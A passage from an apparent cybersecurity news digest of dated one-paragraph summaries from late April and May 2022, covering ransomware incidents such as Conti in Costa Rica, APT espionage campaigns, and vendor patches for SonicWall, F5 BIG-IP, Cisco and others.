SonicWall "strongly urges" customers to patch several high-risk security flaws impacting its Secure Mobile Access (SMA) 1000 Series line of products that can let attackers bypass authorization and, potentially, compromise unpatched appliances. SonicWall SMA 1000 SSLVPN solutions are used by enterprises to simplify end-to-end secure remote access to corporate resources across on-prem, cloud, and hybrid data center environments.

Engineering Firm Parker Discloses Data Breach After Ransomware Attack
Date: 2022-05-16

The Parker-Hannifin Corporation announced a data breach exposing employees' personal information after the Conti ransomware gang began publishing allegedly stolen data last month. Parker is an Ohio-based corporation specializing in advanced motion and control technologies, with a strong focus in aerospace hydraulic equipment. It has a revenue of $15.6 billion and employs over 58,000 people.

Microsoft: Sysrv Botnet Targets Windows, Linux Servers With New Exploits
Date: 2022-05-16

Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers. Redmond discovered a new variant (tracked as Sysrv-K) that has been upgraded with more capabilities, including scanning for unpatched WordPress and Spring deployments.

New Saitama Backdoor Targeted Official From Jordan's Foreign Ministry
Date: 2022-05-13

A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama. Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group.

Google Chrome Updates Failing on Android Devices in Russia
Date: 2022-05-13

A growing number of Android Google Chrome users in Russia are reporting errors when attempting to install the latest update for the web browser. The number of complaints is increasing every day but so far, the cause of the problem remains unknown and is still unsolved.

Zyxel Fixes Firewall Flaws That Could Lead To Hacked Networks
Date: 2022-05-13

Zyxel has fixed critical firewall vulnerabilities that could have allowed threat actors to gain full access to devices and the internal corporate networks they are designed to protect. The company pushed out the security updates in a silent update two weeks ago but more details emerged recently.

A 10-point Plan to Improve the Security of Open Source Software
Date: 2022-05-13

The Linux Foundation and the Open Source Software Security Foundation, with input from executives of 37 companies and many U.S. government leaders, delivered a 10-point plan to broadly address open source and software supply chain security by securing open source software production, improving vulnerability discovery and remediation, and shortening the ecosystem's patching response time.

Ukrainian Gets Four Years for Brute Forcing Thousands of Credentials
Date: 2022-05-13

A Ukrainian man has been handed a four-year jail term for stealing thousands of server logins and putting them up for sale on the dark web. Glib Oleksandr Ivanov-Tolpintsev, 28, from Chernivtsi, was arrested in October 2020 by Polish police and subsequently extradited to the US, where he pleaded guilty in February this year.

Personal Details of 21M SuperVPN, GeckoVPN Users Leaked on Telegram
Date: 2022-05-12

On May 7th, researchers became aware of an online database containing personal details and login credentials for 21 million users of various VPN providers. The leaked database contains 10GB of sensitive information from SuperVPN, GeckoVPN, and ChatVPN. The data was actually stolen over a year ago and put up for sale on dark web marketplaces; now it is publicly available on Telegram for free.

Costa Rica Declares National Emergency Following Conti Cyber-Attack
Date: 2022-05-12

Costa Rica has declared a national emergency following sustained cyber-attacks on government systems by the Russia-based Conti ransomware gang. The decree, signed by newly elected President Rodrigo Chaves, is believed to be the first-ever response of this type by a government to a cyber-attack. Chaves described the attack, which took place on April 18, as an act of “cyber terrorism”.

HP Fixes Bug Letting Attackers Overwrite Firmware in Over 200 Models
Date: 2022-05-12

HP has released BIOS updates today to fix two high-severity vulnerabilities affecting a wide range of PC and notebook products, which allow code to run with Kernel privileges. Kernel-level privileges are the highest rights in Windows, allowing threat actors to execute any command at the Kernel level, including manipulating drivers and accessing the BIOS.

Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks
Date: 2022-05-12

A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, Charming Kitten, Newscaster, or Phosphorus).

Massive Hacking Campaign Compromised Thousands of WordPress Websites
Date: 2022-05-12

Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites by injecting malicious JavaScript code that redirects visitors to scam content. According to Sucuri, at least 322 websites were compromised as a result of this new wave of attacks. The infections automatically redirect site visitors to third-party websites containing malicious content (i.e. phishing pages, malware downloads), scam pages, or commercial websites to generate illegitimate traffic.

CISA Alert: Protecting Against Cyber Threats to Managed Service Providers and their Customers
Date: 2022-05-12

The cybersecurity authorities of the United Kingdom (NCSC-UK), Australia (ACSC), Canada (CCCS), New Zealand (NCSC-NZ), and the United States (CISA, NSA, and FBI) are aware of recent reports that observe an increase in malicious cyber activity targeting managed service providers (MSPs) and expect this trend to continue.[1] This joint Cybersecurity Advisory (CSA) provides actions MSPs and their customers can take to reduce their risk of falling victim to a cyber intrusion. The advisory describes cybersecurity best practices for information and communications technology (ICT) services and functions, focusing on guidance that enables transparent discussions between MSPs and their customers on securing sensitive data. Organizations should implement these guidelines as appropriate to their unique environments, in accordance with their specific security needs, and in compliance with applicable regulations. MSP customers should verify that the contractual arrangements with their provider include cybersecurity measures in line with their particular security requirements.

Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K.
Date: 2022-05-11

A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low-volume email-borne phishing campaign that started on April 26, 2022.

New IceApple Exploit Toolset Deployed on Microsoft Exchange Servers
Date: 2022-05-11

Security researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography. IceApple is a highly sophisticated .NET-based framework that comes with at least 18 modules, each for a specific task, that help the attacker discover relevant machines on the network, steal credentials, delete files and directories, or exfiltrate valuable data. These modules run in memory, emphasizing the adversary’s priority of maintaining a low forensic footprint on the infected host.

Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia
Date: 2022-05-11

An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021. Cybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the Bitter APT based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.

Threat Actors are Actively Exploiting CVE-2022-1388 RCE in F5 BIG-IP updated: CISA Tells Federal Agencies to Fix Actively Exploited F5 BIG-IP Bug
Date: 2022-05-11

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new security vulnerability to its list of actively exploited bugs, the critical-severity CVE-2022-1388 affecting BIG-IP network devices. F5 customers using BIG-IP solutions include governments, Fortune 500 firms, banks, service providers, and consumer brands (including Microsoft, Oracle, and Facebook), with the company claiming that "48 of Fortune 50 companies are F5 customers."

Hackers are Using Tech Services Companies as a 'Launchpad' for Attacks on Customers
Date: 2022-05-11

International cybersecurity agencies are urging IT service providers and their customers to take action to protect themselves from the threat of supply chain attacks. The agencies warn that Russia's invasion of Ukraine has increased the risk of cyberattacks against organizations around the world. They also suggest a number of actions that IT and cloud service providers, along with their customers, can take to protect networks from supply chain attacks, in which attackers gain access to a company that provides software or services to many other companies. "As this advisory makes clear, malicious cyber actors continue to target managed service providers, which is why it's critical that MSPs and their customers take recommended actions to protect their networks," said Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA).

Microsoft Patch Tuesday
Date: 2022-05-10

This month, Microsoft released patches for 75 vulnerabilities. Of these 74, 7 are critical (2 elevation of privilege and 5 remote code execution), 66 are important, and 1 is rated as low. There is one zero-day vulnerability (CVE-2022-26925) that has been publicly disclosed and exploited in the wild. Two other vulnerabilities (CVE-2022-22713 and CVE-2022-29972) have been publicly disclosed but not yet observed exploited in the wild.

New REvil Samples Indicate Ransomware Gang is Back After Months of Inactivity
Date: 2022-05-10

The notorious ransomware operation known as REvil (aka Sodin or Sodinokibi) has resumed after six months of inactivity, an analysis of new ransomware samples has revealed. "Analysis of these samples indicates that the developer has access to REvil's source code, reinforcing the likelihood that the threat group has reemerged," researchers from Secureworks Counter Threat Unit (CTU) said in a report published Monday.

Hacktivists Hacked Russian TV Schedules During Victory Day and Displayed Anti-war Messages
Date: 2022-05-10

Since Russia’s invasion of Ukraine, hacktivists and white hat hackers have continued to support Ukraine by launching cyberattacks on Russian websites and infrastructure. In a recent attack, they defaced Russian TV with anti-war messages and took down the RuTube video streaming site. The attack took place during Russia’s Victory Day; Russians attempting to view the parade were shown pro-Ukraine messages because of a cyber attack that impacted the Russian TV listings systems. According to the BBC, the coordinated attack affected major Russian networks, including Channel One, Rossiya-1, MTS, Rostelecom, and NTV-Plus.

Lincoln College to Close After 157 Years Due to Ransomware Attack
Date: 2022-05-10

Lincoln College, a liberal-arts school in rural Illinois, says it will close its doors later this month, 157 years after its founding, following a brutal hit to its finances from the COVID-19 pandemic and a recent ransomware attack. The decision is all the more striking given that the college had survived multiple disasters, including a major fire in 1912, the Spanish flu, the Great Depression, the World Wars, and the 2008 global financial crisis.

Critical Infrastructure Firms See Cyber-Attacks Surge
Date: 2022-05-10

More than 70% of UK critical national infrastructure (CNI) providers have seen an increase in cyber-attacks since the start of the war in Ukraine, according to new research from Bridewell.

Threat Actors are Actively Exploiting CVE-2022-1388 RCE in F5 BIG-IP
Date: 2022-05-10

Threat actors started massively exploiting the critical remote code execution vulnerability, tracked as CVE-2022-1388, affecting F5 BIG-IP. F5 and CISA released a security advisory last week warning customers to install the latest updates for a variety of products.

US Government Offers $15m Reward for Info on Conti Actors
Date: 2022-05-09

The US authorities have offered a multimillion-dollar reward for information leading to the identification, arrest and/or conviction of individuals involved in attacks using the Conti ransomware variant. Offered under the Department of State’s Transnational Organized Crime Rewards Program (TOCRP), the money is split into two pots: up to $10m for information on the identity or location of individuals “who hold a key leadership position” in Conti; and up to $5m for information leading to the arrest or conviction of anyone conspiring to use the malware in attacks.

Cyber Attack Halts Production at Ag Equipment Maker AGCO Fendt
Date: 2022-05-09

A cyber attack has disrupted the operations of AGCO/Fendt, a major manufacturer of agricultural equipment, the company has acknowledged. AGCO/Fendt, headquartered in Duluth, Georgia, said in a statement to the Security Ledger that it was the subject of a cybersecurity incident that “has impacted some of our production facilities. We are working to address the issues. Our first priority is to restore those critical activities needed to keep farmers farming.” The company first acknowledged the attack on Thursday, May 5.

Ukrainian CERT Warns Citizens of a New Wave of Attacks Distributing Jester Malware
Date: 2022-05-09

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of phishing attacks that deploy an information-stealing malware called Jester Stealer on compromised systems. The mass email campaign carries the subject line "chemical attack" and contains a link to a macro-enabled Microsoft Excel file which, when opened, infects the computer with Jester Stealer.

Check Your Gems: Rubygems Fixes Unauthorized Package Takeover Bug
Date: 2022-05-09

The RubyGems package repository has fixed a critical vulnerability that would allow anyone to unpublish ("yank") certain Ruby packages from the repository and republish their tainted or malicious versions with the same file names and version numbers.

Costa Rica Declares National Emergency After Conti Ransomware Attacks
Date: 2022-05-09

On Sunday, May 8th, newly elected Costa Rican President Rodrigo Chaves declared a national emergency following cyber-attacks from the Conti Ransomware group on multiple government bodies.

GitHub Announces Mandatory 2FA for Code Contributors
Date: 2022-05-06

Code hosting platform GitHub on Wednesday said it would make it mandatory for software developers to use at least one form of two-factor authentication (2FA) by the end of 2023. The Microsoft-owned platform has been supporting 2FA for years and is allowing users to use physical and virtual security keys, Time-based One-Time Password (TOTP) authenticator apps, and SMS as a second form of authentication.

Ukraine’s IT Army is Disrupting Russia's Alcohol Distribution
Date: 2022-05-06

Hacktivists operating on the side of Ukraine have focused their DDoS attacks on a portal that is considered crucial for the distribution of alcoholic beverages in Russia. DDoS (distributed denial of service) attacks are collective efforts to overwhelm servers with large volumes of garbage traffic and bogus requests, rendering them unable to serve legitimate visitors.

Security Researchers: Here’s How the Lazarus Hackers Start Their Attacks
Date: 2022-05-06

The Lazarus hacking group is one of the top cybersecurity threats from North Korea, recently catching the attention of the US government for massive cryptocurrency heists. Now researchers at NCC Group have pieced together a few of the tools and techniques Lazarus hackers have been using recently, including social engineering on LinkedIn, messaging US defense contractor targets on WhatsApp, and installing the malicious downloader LCPDot.

Microsoft, Apple and Google Team Up on Passwordless Standard
Date: 2022-05-06

Some of the world’s biggest tech companies are throwing considerable weight behind a common passwordless sign-in standard that could finally signal the end of static credentials for many users. Apple, Microsoft and Google announced plans to support the FIDO Alliance and World Wide Web Consortium (W3C) standard, making it easier for websites and apps to deliver end-to-end passwordless authentication via fingerprint/face scan or device PIN.

New Raspberry Robin Worm Uses Windows Installer to Drop Malware
Date: 2022-05-06

Red Canary researchers have discovered a new wormable Windows malware that spreads through USB drives. They have dubbed the malware Raspberry Robin and first observed the activity back in September 2021. Using detection tools on customer networks, Red Canary saw the malware spreading in the technology and manufacturing sectors.

Cisco Issues Patches for 3 New Flaws Affecting Enterprise NFVIS Software
Date: 2022-05-05

Cisco Systems on Wednesday shipped security patches to contain three flaws impacting its Enterprise NFV Infrastructure Software (NFVIS) that could permit an attacker to fully compromise and take control over the hosts.

Decade-Old Bugs Discovered in Avast, AVG Antivirus Software
Date: 2022-05-05

Researchers have disclosed two high-severity vulnerabilities in Avast and AVG antivirus products which have gone undetected for ten years.

New NetDooka Malware Spreads via Poisoned Search Results
Date: 2022-05-05

A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device. This previously undocumented malware framework features a loader, a dropper, a protection driver, and a powerful RAT component that relies on a custom network communication protocol.

FBI says Business Email Compromise is a $43 Billion Scam
Date: 2022-05-05

The Federal Bureau of Investigation (FBI) said today that the amount of money lost to business email compromise (BEC) scams continues to grow each year, with a 65% increase in the identified global exposed losses between July 2019 and December 2021. From June 2016 until July 2019, the FBI's Internet Crime Complaint Center (IC3) received victim complaints regarding 241,206 domestic and international incidents, with a total exposed dollar loss of $43,312,749,946.

F5 Warns its Customers of Tens of Flaws in its Products
Date: 2022-05-05

F5 and US-CERT released security notifications this morning, warning of a series of vulnerabilities in various products. In total the company addressed 43 vulnerabilities, the most severe being tracked as CVE-2022-1388. It received a CVSS score of 9.8 and allows an unauthenticated attacker to exploit BIG-IP systems through the management port. Using the system, they can execute arbitrary system commands, create or delete files, or disable services.

State-Backed Chinese Hackers Target Russia
Date: 2022-05-04

Financially motivated and state-sponsored actors around the globe continue to use the war in Ukraine as a lure for phishing campaigns, with Chinese groups targeting Russia of late, according to Google. The tech giant’s Threat Analysis Group (TAG) claimed in its new quarterly bulletin that the usual governments of China, Iran, North Korea and Russia were responsible for many of the attacks recorded over the period.

Unpatched DNS Bug Affects Millions of Routers and IoT Devices
Date: 2022-05-04

An unpatched DNS bug in a popular C standard library is putting millions of IoT devices at risk of DNS poisoning attacks. Using the vulnerability, a threat actor may be able to spoof DNS responses or redirect a victim to a malicious website under their control.

Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies
Date: 2022-05-04

An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019. Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information. Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.

Conti, Revil, Lockbit Ransomware Bugs Exploited to Block Encryption
Date: 2022-05-04

Hackers commonly exploit vulnerabilities in corporate networks to gain access, but a researcher has turned the table by finding exploits in the most common ransomware and malware being distributed today. Malware from notorious ransomware operations like Conti, the revived REvil, the newcomer Black Basta, the highly active LockBit, or AvosLocker, all came with security issues that could be exploited to stop the final and most damaging step of the attack, file encryption.

Pro-Ukraine Hackers Use Docker Images to DDoS Russian Sites
Date: 2022-05-04

Docker images with a download count of over 150,000 have been used to run distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites managed by the government, military, and news organizations. Behind the incidents are believed to be pro-Ukrainian actors such as hacktivists, likely backed by the country's IT Army.

Aruba and Avaya Network Switches Are Vulnerable to RCE Attacks
Date: 2022-05-03

Security researchers have discovered five vulnerabilities in network equipment from Aruba (owned by HP) and Avaya (owned by Extreme Networks) that could allow malicious actors to execute code remotely on the devices. The damage caused by a successful attack ranges from data breach and complete device takeover to lateral movement and overriding network segmentation defenses.

Chinese Cyber-espionage Group Moshen Dragon Targets Asian Telcos
Date: 2022-05-03

Researchers have identified a new cluster of malicious cyber activity tracked as Moshen Dragon, targeting telecommunication service providers in Central Asia. While this new threat group has some overlaps with "RedFoxtrot" and "Nomad Panda," including the use of ShadowPad and PlugX malware variants, there are enough differences in their activity to follow them separately.

AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection
Date: 2022-05-03

Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws.

SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse
Date: 2022-05-03

Recorded Future’s Insikt Group continues to monitor Russian state-sponsored cyber espionage operations targeting government and private sector organizations across multiple geographic regions. From mid-2021 onwards, Recorded Future’s midpoint collection revealed a steady rise in the use of NOBELIUM infrastructure tracked by Insikt Group as SOLARDEFLECTION, which encompasses command and control (C2) infrastructure. In this report, we highlight trends observed by Insikt Group while monitoring SOLARDEFLECTION infrastructure and the recurring use of typosquat domains by its operators.

UNC3524 APT Uses IP Cameras to Deploy Backdoors and Target Exchange
Date: 2022-05-03

Mandiant researchers discovered a new APT group, tracked as UNC3524, that heavily targets the emails of employees who focus on corporate development, mergers and acquisitions, and large corporate transactions. Once it gained initial access to the target systems, UNC3524 deployed a previously unknown backdoor tracked by Mandiant researchers as QUIETEXIT. The QUIETEXIT backdoor borrows code from the open-source Dropbear SSH client-server software. The threat actors deployed QUIETEXIT on network appliances within the target network, including load balancers and wireless access point controllers.

Chinese "Override Panda" Hackers Resurface With New Espionage Attacks
Date: 2022-05-02

A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. "The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week. "The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country."

Here's a New Tool That Scans Open-Source Repositories for Malicious Packages
Date: 2022-05-02

The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories. Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software.

Russian Hackers Compromise Embassy Emails to Target Governments
Date: 2022-05-02

Security analysts have uncovered a recent phishing campaign from Russian hackers known as APT29 (Cozy Bear or Nobelium) targeting diplomats and government entities in Europe, the Americas, and Asia. APT29 is a state-sponsored actor that focuses on cyberespionage and has been active since at least 2014. Its targeting scope is determined by current Russian geopolitical strategic interests.

REvil Ransomware Returns: New Malware Sample Confirms Gang is Back
Date: 2022-05-02

“The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks”. The REvil ransomware group was shut down by law enforcement back in October of 2021. Various members of the group were arrested and their Tor servers were seized. There have been rumors that the group's Tor servers were back online, and this week we are seeing reports that their previous websites are now redirecting visitors to a new unnamed ransomware operation.

Hackers Fool Major Tech Companies Into Handing Over Data of Women and Minors to Abuse
Date: 2022-04-29

Some major tech companies have unwittingly opened harassment and exploitation opportunities to the women and children who they have pledged to protect. This happened because they provided information in response to emergency data requests from legitimate law enforcement accounts that hackers had compromised. This finding came from four federal law enforcement agencies and a couple of industry investigators.

Ongoing DDoS Attacks From Compromised Sites Hit Ukraine
Date: 2022-04-29

Ukraine’s computer emergency response team (CERT-UA) announced that it is investigating, along with the National Bank of Ukraine (CSIRT-NBU), ongoing DDoS (distributed denial of service) attacks targeting pro-Ukraine sites and the government web portal.

Microsoft Fixes ExtraReplica Azure Bugs That Exposed User Databases
Date: 2022-04-29

Microsoft has addressed a chain of critical vulnerabilities found in the Azure Database for PostgreSQL Flexible Server that could let malicious users escalate privileges and gain access to other customers' databases after bypassing authentication.

EmoCheck Now Detects New 64-bit Versions of Emotet Malware
Date: 2022-04-29

The Japan CERT has released a new version of its EmoCheck utility to detect new 64-bit versions of the Emotet malware that began infecting users this month. Emotet is one of the most actively distributed malware families, spread through phishing emails with malicious attachments, including Word/Excel documents, Windows shortcuts, ISO files, and password-protected zip files. The phishing emails use creative lures to trick users into opening the attachments, including reply-chain emails, shipping notices, tax documents, accounting reports, or even holiday party invites.

FIN7 BadUSB
Date: 2022-04-28

The criminal group FIN7 has been mailing malware-ridden USBs to various entities in the transport, insurance, and defense industries under the guise that they originated from a trusted source, such as Amazon and the US Department of Health and Human Services. Those from the former were supposedly gift vouchers, while the latter claimed to include new COVID guidelines. FIN7’s badUSB attacks serve as a reminder of two key vulnerabilities present among all organizations.
